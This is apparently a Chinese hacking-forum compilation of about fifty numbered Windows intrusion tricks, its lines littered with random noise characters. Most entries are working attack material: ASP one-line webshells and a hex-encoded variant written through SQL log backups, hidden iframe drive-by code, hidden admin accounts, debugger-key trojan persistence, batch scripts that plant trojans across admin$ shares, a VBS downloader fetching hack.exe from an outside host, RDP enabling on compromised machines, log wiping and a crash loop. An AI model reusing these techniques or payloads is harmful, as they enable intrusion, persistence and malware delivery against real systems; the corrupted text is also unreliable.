Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
/ n/ z( t3 l/ S$ F Ycacls C:\windows\system32 /G hqw20:R
6 C' m0 X8 F9 S: U9 B思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
4 D3 T5 H& {* E恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
: y+ ]% G6 k/ I8 A p; t4 V
5 a' K: D/ J% {: E2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。+ b+ ] X# }" T: s- b
( J8 W3 a6 `4 X: i& H, Z* _
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。3 l" M6 {8 P7 b' b: Z
" Q' {3 P" B1 T( s4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号' Q2 W2 R+ _8 J) u; j S
- s: L) B* P7 O0 h- B$ [3 m& w3 P
5、利用INF文件来修改注册表$ U1 @8 w) t0 o$ M* g7 S& e& J
[Version]' U0 c0 [9 z( u: s9 U
Signature="$CHICAGO$"' C: D) \: v* w: z/ J ?
[Defaultinstall]
8 n( ?2 p# I0 f% S3 z1 w2 saddREG=Ating
+ F; I! q2 ]+ i, P h[Ating]( S8 I4 g( y8 _+ Q' |
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1") B+ N/ l" Q. Q- Q. g
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! A, ?! A! V' ~; ^! y8 irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
1 B' Q' a* L5 n: I其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
" a: }* J8 B5 P v/ {" y, RHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
! G" }+ z5 a3 a: E$ T' d8 fHKEY_CURRENT_CONFIG 简写为 HKCC' X7 w% m& o1 F* X3 J1 b
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) R/ ~7 z; t1 f* U
"1"这里代表是写入或删除注册表键值中的具体数据
R3 L# N5 v% _: l
4 v2 M- J; z) i3 c6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
$ G' |7 m: M$ J多了一步就是在防火墙里添加个端口,然后导出其键值
3 }$ b6 @4 P7 [" J% Q/ a0 \[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
6 ]6 c( x$ t1 b* z% ~' B3 b2 O; M1 [0 T' o) B8 p# ?
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ f6 Y% A! w3 U3 `在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 W6 s9 v8 ^% S9 u9 S; a/ q7 ~/ ~/ U8 [
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
' X% z% O B, Z$ T' N
% c7 \- ~4 x8 u& S. `/ ?8 m9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,0 {9 l3 s# g: x9 X9 X) i8 K& x
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。0 {+ C( w" x& ?
% v6 N; h, Y$ a3 e4 y0 Z
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
. I. O2 W! f' ], {' m! c& m0 ^' u( Y
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,. U, |& [3 ^9 q7 U7 I
用法:xsniff –pass –hide –log pass.txt
) j6 s; t! ]6 e
+ Q/ ^ R) h4 ^% |5 ]* Y, v4 X) t12、google搜索的艺术
- a/ ?6 v0 r: x# I! J0 z2 Z搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
f6 l2 E5 ~( [6 }2 W或“字符串的语法错误”可以找到很多sql注入漏洞。; J" l% l+ l- A2 f9 j% X3 j
- R5 J7 h# `5 d2 V7 P2 D: w13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) ^( _5 S8 h+ [" l
, L. p9 J" k. i# w5 ~, K2 E2 n14、cmd中输入 nc –vv –l –p 1987
8 r5 u' I3 M' v4 }/ t做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
! S9 k' l3 u0 U6 m
0 C1 t9 U( ?- o$ i) T1 c" @; @15、制作T++木马,先写个ating.hta文件,内容为
9 N- T" Z7 K9 Z6 S r5 q5 e<script language="VBScript">
% H$ E( ]# H L9 Lset wshshell=createobject ("wscript.shell" )
. E1 a8 H; t' b( C9 Ra=wshshell.run("你马的名称",1)
: G* y* Q0 |/ ~5 @) Q, \' }window.close
5 E+ k: O6 Y' c5 ?</script>
6 K4 x- r7 r* M1 d再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: a, j- c1 ~" ? S" d7 o7 X, N& ?$ c1 b, N8 e9 c, t
16、搜索栏里输入" Z1 a5 _; K7 N: `/ X
关键字%'and 1=1 and '%'='
& H# u" V+ @7 v! T% S5 F o关键字%'and 1=2 and '%'='2 u6 t: ~7 D- ^5 G3 q( h* p
比较不同处 可以作为注入的特征字符
: L$ i* A, P. v0 V& E
9 V5 z' o8 l3 u j; N, o17、挂马代码<html>
, D, T) |0 t3 e% j) f<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>% ]' A# ^3 O' N0 q% S
</html>$ `6 [- W1 j0 v8 J
3 T' W* A9 f# h" @18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,% C2 a, n0 o( c6 H1 B
net localgroup administrators还是可以看出Guest是管理员来。" `9 Z! i6 H5 j. ^. c
, `3 J6 M7 l' x3 |' u$ D
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等+ Y# ^1 h }! Z3 K' B0 h
用法: 安装: instsrv.exe 服务名称 路径0 V2 Q; S/ d1 X/ W
卸载: instsrv.exe 服务名称 REMOVE
& t" F0 |3 }, h% S; i* G1 `
1 F" a, z1 O! H! T
% {; O$ \7 F" ~5 H21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" d, Y' K( L5 E% \不能注入时要第一时间想到%5c暴库。; J& F2 P- @) M( J* E! I1 {! F
/ \' k+ k9 F! B$ F
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~+ q7 ?) ?# @0 q6 ?. i
0 j* w, [/ D; {& T `; m) A V) ~23、缺少xp_cmdshell时
3 x6 `$ e3 B# {尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'+ ^, I( H$ t; d; Q; _* p
假如恢复不成功,可以尝试直接加用户(针对开3389的)
* h1 {5 d) z& a# p! V0 F* `1 {' c8 tdeclare @o int
! q: I& a2 y* Z& mexec sp_oacreate 'wscript.shell',@o out( g' w7 U0 K# q, P" z
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员) |/ a- z" y& j1 y* q( T$ L. G. @
a7 [9 x$ [) l2 `4 [2 J0 u h
24.批量种植木马.bat
2 K, C, K, g, C" sfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
6 H. H: i, p/ x, Q9 {4 h) _for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 n, m; L* u5 e2 A' A扫描地址.txt里每个主机名一行 用\\开头3 o+ ]! \1 ?' }8 F( F5 w. }
5 k8 n& E1 R0 t k/ m1 l1 Z( G
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
7 l' N% @. u4 I- h) R) p! B- B, Y6 e- p; a2 q; R# F9 M" E& s
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.! \+ e( T5 h8 i- @" D* |
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.& R/ r, j2 Z. s- c0 m" V* v; N8 w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, A3 \6 p: `/ W$ `
0 J; f$ _0 u+ a( T+ J+ |' N1 [9 G
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) b1 d+ k1 L' ^# V% O然后用#clear logg和#clear line vty *删除日志
4 N0 B; u' c" O' \% {/ J+ H2 u" _3 W
* K) M- L: @- K" M" R. c28、电脑坏了省去重新安装系统的方法
6 O1 c( |7 }$ x( ^6 I8 a- M纯dos下执行,9 D& y$ S9 p+ h
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 ]2 K" ]: g" J. d5 l1 M6 F
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config8 W* \3 p' D, o' P& |
: v8 G. j1 Q. _/ ~
29、解决TCP/IP筛选 在注册表里有三处,分别是:& ]; n/ W6 s4 `$ P2 ^
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" ^ P' s c2 F! K" I+ N
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& l; [" A! F) E j) Q
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 t9 _% W* t8 [6 p7 p! M Q分别用
4 a2 p/ @4 J' ?. O' ]5 ~8 Zregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# {- o; \; x! S9 W
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip# Y5 @+ b" ^8 ?2 z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 D8 ~0 ?" B0 P3 e4 B; F9 V3 N( {命令来导出注册表项 E1 T) X# e4 ?6 C( U! ]+ P; F
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
$ R9 s5 \5 K; f$ s# ?* @改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 C% h# [: s% q% g3 s5 nregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。# J' n- n, I0 K
8 B! h9 E( W2 q7 S30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U* r) q! v- B2 }5 L S3 m
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
8 Z5 K+ k, |1 ` ~4 p2 \/ ^' j. ]$ ] `& m
31、全手工打造开3389工具
3 h( t! n( m2 y5 X" q; e1 {打开记事本,编辑内容如下:$ m) W* Z9 o4 ]& S" H; B* D
echo [Components] > c:\sql
' m0 F$ G" R7 H: R6 j. \echo TSEnable = on >> c:\sql; q7 y" M5 v; ?+ G" ]" E
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) o* T5 e6 W- o8 G: Z# _0 t
编辑好后存为BAT文件,上传至肉鸡,执行
2 F! V7 |1 Q' D% x5 p. u0 ]5 r; l) J; F* C7 i% E z, V% o! [
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马) p& b# W, c& h, L$ a! Z4 j
6 j) F/ v! _# Q33、让服务器重启% v" u+ v6 B U3 C- D$ T e0 D
写个bat死循环:9 Y* C) N0 B% ^7 v5 }
@echo off5 N3 k6 c. j9 _5 \
:loop1
# I' D0 d1 {3 l g# Ncls
6 H E4 ]. \) `6 |start cmd.exe) F# k/ F- t% s* k
goto loop1; P$ R4 A- [2 V% b* E' a' |6 ?; N
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启/ {: i7 F/ d, p# b
( R. v4 ?0 U: o" K34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! q. E9 D* ^/ z+ Z@echo off
. l# q) C9 r6 z" wdate /t >c:/3389.txt
' t8 R/ T3 w& E" V4 [. ?2 {time /t >>c:/3389.txt: R6 x8 T3 G6 ~9 }
attrib +s +h c:/3389.bat
. R0 J1 A1 ]3 G4 s2 ^) Battrib +s +h c:/3389.txt
! W. z# n6 r, znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ L8 }6 B1 J5 }! T并保存为3389.bat
! g; a! G$ c5 s1 o( k5 w打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号. K0 e2 E, G" w, P
9 j F1 S0 @* n+ J; J35、有时候提不了权限的话,试试这个命令,在命令行里输入:
3 j) ~) o; y0 J9 q5 l4 e0 ^# m- Kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
2 d. h9 t" x( x$ ~输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% S s+ [5 q* e7 B' k! r) Z9 l9 T& U5 e( q, b4 P% m' O
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件8 h" \9 i1 B! A7 g
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址4 r% I& f, e# w1 s2 I& P. J
echo 你的FTP账号 >>c:\1.bat //输入账号
6 O4 U9 m2 Z, a& ?5 c8 recho 你的FTP密码 >>c:\1.bat //输入密码9 \2 T3 {; w+ L2 B3 A3 ^
echo bin >>c:\1.bat //登入 M \ Y4 a% X
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ C" ]- G+ f/ e8 j" V4 v" necho bye >>c:\1.bat //退出
1 Q P( F( r$ ^/ y然后执行ftp -s:c:\1.bat即可
& n( y. O8 w5 E+ b O. U6 ]: b( }8 f- U7 S9 a- M- T8 x9 G. i8 h
37、修改注册表开3389两法% f& m* e: O' Y" O+ k
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
' w4 K5 G; I# d& R/ {+ s5 u8 y( decho Windows Registry Editor Version 5.00 >>3389.reg1 l0 s9 F8 y) F: `% k+ ^- D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg2 @. M4 c# E0 Y' Q" h, p4 b
echo "Enabled"="0" >>3389.reg
! V6 ^; l p2 J* ]/ \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
7 i; b4 \, l7 W% S$ m1 |4 T) xNT\CurrentVersion\Winlogon] >>3389.reg* k( g5 s6 i2 B$ ~
echo "ShutdownWithoutLogon"="0" >>3389.reg
) W& [4 M. B1 \8 C: Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 G3 p. W$ i/ O8 c7 u! M>>3389.reg
, c1 w! _6 r( A1 i" ]5 b: m) F! Necho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
; K- L5 s1 T/ M$ Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: }4 H5 V/ }6 [' i* h3 q ^>>3389.reg
6 e( V7 t0 ~( k4 @echo "TSEnabled"=dword:00000001 >>3389.reg& n4 {, f7 |& W7 X! S0 u5 T2 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg, `) g0 W, p- G/ h% F! s; x
echo "Start"=dword:00000002 >>3389.reg3 K/ Y0 Y& X+ g! R. b$ s; ]) J. ]! [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]7 U( I; z6 e' f% V$ ]. g+ w" W
>>3389.reg* v" W6 {9 z5 j: d: U
echo "Start"=dword:00000002 >>3389.reg1 T; B: T; ~, r+ l5 z3 t
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ u* ?) e) d, L2 {/ B4 secho "Hotkey"="1" >>3389.reg' l' S1 Y A' s' D9 q9 [3 ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) q! j; H, V4 |: @Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 u) n8 s# [$ S: A$ }! Y g6 C
echo "PortNumber"=dword:00000D3D >>3389.reg! C7 f" E7 x0 O; K6 z2 }) [2 E. k" F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal b, g, j! p5 K
Server\WinStations\RDP-Tcp] >>3389.reg2 ]8 E2 e" U+ S3 [/ \& U
echo "PortNumber"=dword:00000D3D >>3389.reg/ x4 a0 C( S9 J. D
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。: `5 d- [. S; Q) ~- ~5 f$ q
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
9 |1 `( o% e# d( Q因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效: I* _6 n+ P" C! R+ d6 E
(2)winxp和win2003终端开启
/ M1 }. G2 G$ [; T4 ?; U' U0 j用以下ECHO代码写一个REG文件:
_% P; z0 {& K9 c. r( _: {( ^% Xecho Windows Registry Editor Version 5.00>>3389.reg
: x! F; |9 S# O9 _6 Q# becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; x/ {6 X S: _9 `Server]>>3389.reg; h4 o. @$ D4 Q" X7 |4 J
echo "fDenyTSConnections"=dword:00000000>>3389.reg
2 y0 v% ]& N8 X9 e' a4 |6 K- Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% f# R' `' `) D$ ~- FServer\Wds\rdpwd\Tds\tcp]>>3389.reg
9 v4 X8 ~8 \8 m! Q4 recho "PortNumber"=dword:00000d3d>>3389.reg* M# i0 Q+ F( b4 h+ ^) E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 L/ @% o$ u, `5 N" g9 r. I
Server\WinStations\RDP-Tcp]>>3389.reg
/ o+ a3 P) `$ W9 decho "PortNumber"=dword:00000d3d>>3389.reg' J B5 ~* F7 v& Y
然后regedit /s 3389.reg del 3389.reg9 M; O% W% b* l
XP下不论开终端还是改终端端口都不需重启
8 S5 L9 K5 C/ e4 A
4 D% c$ Q4 b; c' l% B- z8 @38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* u% _) M. h$ s e+ _3 T用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 y4 s" ?; h" X
; z& z W5 E0 {3 f' M6 \
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 Q3 c3 y7 q( M# x* q(1)数据库文件名应复杂并要有特殊字符/ _# M3 i o! P
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# Q+ r1 p' {8 @) I将conn.asp文档中的
& S5 `- p: E, s* v+ JDBPath = Server.MapPath("数据库.mdb")
2 q ?$ A! X3 _, @. K" v7 l" f0 zconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ U! C& c, M, \
, s; S7 l- h( O9 j0 i0 s. B! |修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
* L& j0 }* I9 f(3)不放在WEB目录里0 D1 {- v6 g& j; T$ T+ i
6 l5 G7 R& E2 i& K40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, c& ]4 G4 R- x& U可以写两个bat文件( Z9 h! Q1 y2 E7 W$ I
@echo off/ q1 L0 M, G5 d& G
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
) G8 j, O2 O' \# q3 @5 m@del c:\winnt\system32\query.exe
8 L3 J$ q1 }0 W0 k@del %SYSTEMROOT%\system32\dllcache\query.exe) ? ^- P3 l* f/ o, ~
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
9 G) o& Y; H; d+ z& ?' K+ i( j A" h# a4 r( [/ _; J
@echo off H, O- V3 J/ `; W
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
) a$ Q; X0 m2 s) g@del c:\winnt\system32\tsadmin.exe
3 Q7 D4 z u- T4 C@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex; `2 ^% ^; W! _0 [5 ?0 w
6 I8 B2 a5 B5 t! r41、映射对方盘符
# N0 T7 I) T* n' u, r" \* o4 _telnet到他的机器上,
* W# K4 L: J7 {3 S5 tnet share 查看有没有默认共享 如果没有,那么就接着运行+ u' i, M" @, g6 ]
net share c$=c:! J2 s4 z$ ~+ E3 Z" Q6 T# E
net share现在有c$
( K6 z$ q/ T& J0 e" U9 D在自己的机器上运行
/ @* k( e( C( Z7 C4 [net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
( d( l0 \6 B1 Q2 d- J7 N! O' l2 q$ L; k/ q. r2 t. v
42、一些很有用的老知识
. D3 S1 ?, V0 `& A: L9 p: @, |type c:\boot.ini ( 查看系统版本 ): l* C! @' v0 d7 z9 u* I! ~
net start (查看已经启动的服务)
8 t% N. u2 ^# ]: rquery user ( 查看当前终端连接 )! E3 i- H& q9 T- I8 s, K
net user ( 查看当前用户 )
% a% A- S, w' f8 fnet user 用户 密码/add ( 建立账号 )1 z( c( K# C6 q
net localgroup administrators 用户 /add (提升某用户为管理员)$ B& [, G' p% M( ~
ipconfig -all ( 查看IP什么的 )
* |) S4 x3 P9 mnetstat -an ( 查看当前网络状态 )
$ I3 X# [% V- u7 |5 S/ efindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
2 @+ p) P, h" a& S4 T- p4 f0 a克隆时Administrator对应1F4
5 U- F$ K4 B3 c. p% M( T$ m3 ?: {) Kguest对应1F5
4 s2 M" V; F7 D) {$ Ftsinternetuser对应3E8' w% Y# G/ f' w6 i& S2 J8 m1 e3 o/ _
1 G7 G) q0 m! Z* A43、如果对方没开3389,但是装了Remote Administrator Service
5 a, O/ u5 k7 T1 a" f4 K- u8 k$ G用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
% ^& o5 U2 L5 y/ s解释:用serv-u漏洞导入自己配制好的radmin的注册表信息* f8 v4 k+ L9 U0 i$ z* |- G+ e
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"" N, _4 T2 N$ \5 _7 ?& }7 Y. B6 @; S
* a) B% c8 t: h- \( ?44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)2 `: \5 }3 l X& o1 R' ^4 P# D8 U
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' b, h& z+ W/ \. m3 c1 V! u8 }3 L* R3 Z; E% |: B, F4 x- R$ m
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
% ^3 O; E( p. }0 x; E! lecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open. k$ C1 _; B$ `; k7 Z' f0 s
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =8 h. M, B* U5 P$ g
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
) U9 j: q+ J& Q1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# ?& k7 E: U& r: {# @(这是完整的一句话,其中没有换行符)9 @$ r* L: T5 E8 f' Y
然后下载:" p/ t0 g! J. M7 |# d- p6 ^
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 s6 [# C) I4 @- L
: e* N: `6 P3 B3 Q) J3 f+ c46、一句话木马成功依赖于两个条件:
. h2 Q9 E! ~1 m( _5 G1、服务端没有禁止adodb.Stream或FSO组件
1 S4 [- t; y' ?1 A/ s* g, @2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 n+ y7 _7 t( E" [, @: D
" {, G( J3 u8 X$ `1 M47、利用DB_OWNER权限进行手工备份一句话木马的代码:
$ F- ?6 { W! L) A* B4 F7 L P) e;alter database utsz set RECOVERY FULL--
# a d" o! V9 [! k& V;create table cmd (a image)--" x U3 V" L# L& a, u
;backup log utsz to disk = 'D:\cmd' with init--
8 _' t! M% {3 W- h( x5 F;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--8 z6 e" o% q+ p7 l; Q6 t, t }
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 @8 H" {# O0 V. F9 ~注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。; \+ o' A3 r0 D& z
& O1 {3 o% l' C( D ?48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) n4 r0 c! O) j/ ]/ _! y+ n4 S8 @6 I4 I0 d+ J- C6 ~! p
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options4 @5 D9 Q. I& `/ ~0 V$ U9 _' b
所有会话用 'all'。
1 u+ m7 }* z$ \; d% D: D-s sessionid 列出会话的信息。
' K7 Q$ v# {# ?* E-k sessionid 终止会话。
. a+ N' y8 u- Y9 o- ~) z: {: O-m sessionid 发送消息到会话。" t# C# u! ~- l: j: F6 x% A, m1 ]
/ R; A; q* z% M. F$ _6 g: y+ v: e9 b
config 配置 telnet 服务器参数。
2 b& K8 p1 b5 C" |' j% d: T& F
common_options 为:0 U/ o2 P1 Z' J: Q: ]7 I) ^$ p, G
-u user 指定要使用其凭据的用户
L( p. u5 }! c8 M& e( }: N-p password 用户密码
6 Q0 c9 b" }6 i* o
5 {# M% ~5 P7 G( O) ]' [9 |config_options 为:. m4 P+ {- o- } E* d0 Q/ A' P
dom = domain 设定用户的默认域; b/ {4 Y: x- X" z, U2 J \
ctrlakeymap = yes|no 设定 ALT 键的映射
3 C. k( _3 ?( x+ ^& K8 Y( }4 _% F: ?% atimeout = hh:mm:ss 设定空闲会话超时值+ U9 I+ y* i# r
timeoutactive = yes|no 启用空闲会话。
& `, S' A6 T5 o7 [" `4 ^6 y1 z. qmaxfail = attempts 设定断开前失败的登录企图数。) M$ p' ^7 o! c$ c
maxconn = connections 设定最大连接数。7 {, s/ O N- P- H
port = number 设定 telnet 端口。
. m: V- ~5 Z) H9 V7 Y) qsec = [+/-]NTLM [+/-]passwd( j/ p( C/ A+ P. T( r/ B* k! e" f
设定身份验证机构; R# u. A3 n! L. A: o5 W0 \$ H
fname = file 指定审计文件名。
2 x) f) |. |6 U# Z; n9 Vfsize = size 指定审计文件的最大尺寸(MB)。* C2 o7 ^! o' N7 P! {
mode = console|stream 指定操作模式。
( h! Q0 Z$ A' e- ]0 Q2 Fauditlocation = eventlog|file|both
$ O# e5 U+ I3 _3 Y指定记录地点
8 Q" Y; u& H* {1 {audit = [+/-]user [+/-]fail [+/-]admin/ h# Y# |6 z$ p! Z: ]% Z
. ]3 @, s H7 {& B( h7 B! v2 i' H49、例如:在IE上访问:
# S+ m0 @! r& r' d" t. A& vwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/4 G$ _: \1 J) f/ b1 i' Z0 i
hack.txt里面的代码是:) k7 X' G- a( u8 g/ J: P) \
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ Y! c0 s( ~/ v7 ~) r把这个hack.txt发到你空间就可以了!4 d, s3 x. e0 q5 ?* q: y
这个可以利用来做网马哦!( [6 m) C2 z7 p6 Q
+ g& _* `- D) Q+ T! K; s50、autorun的病毒可以通过手动限制!* F' P1 a0 k$ V# z2 H5 A; J4 F% ^
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
, W3 A! z( P4 e2,打开盘符用右键打开!切忌双击盘符~
, t5 L7 T7 j a5 m) k3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 K; Q0 ~: D8 O: L. w9 b; c
) U3 Z7 Q7 P/ q- T: j/ {2 |51、log备份时的一句话木马: S% X' l% B9 F: j( R
a).<%%25Execute(request("go"))%%25>
2 m X8 u. Z8 o, k2 r$ Bb).<%Execute(request("go"))%>
. C i w! E! @7 Y% s5 P5 nc).%><%execute request("go")%><%
4 G, F C) \6 q' Y) sd).<script language=VBScript runat=server>execute request("sb")</Script>
& S' _ M$ e3 B! ^+ d! U6 pe).<%25Execute(request("l"))%25>
4 p0 \) I' q t8 M2 g3 O9 Hf).<%if request("cmd")<>"" then execute request("pass")%>4 y Y1 f% o5 `: j% j
) q. Q a# m* v, j/ b3 a& X8 k52、at "12:17" /interactive cmd
# z+ X( m& Q( {$ I执行后可以用AT命令查看新加的任务
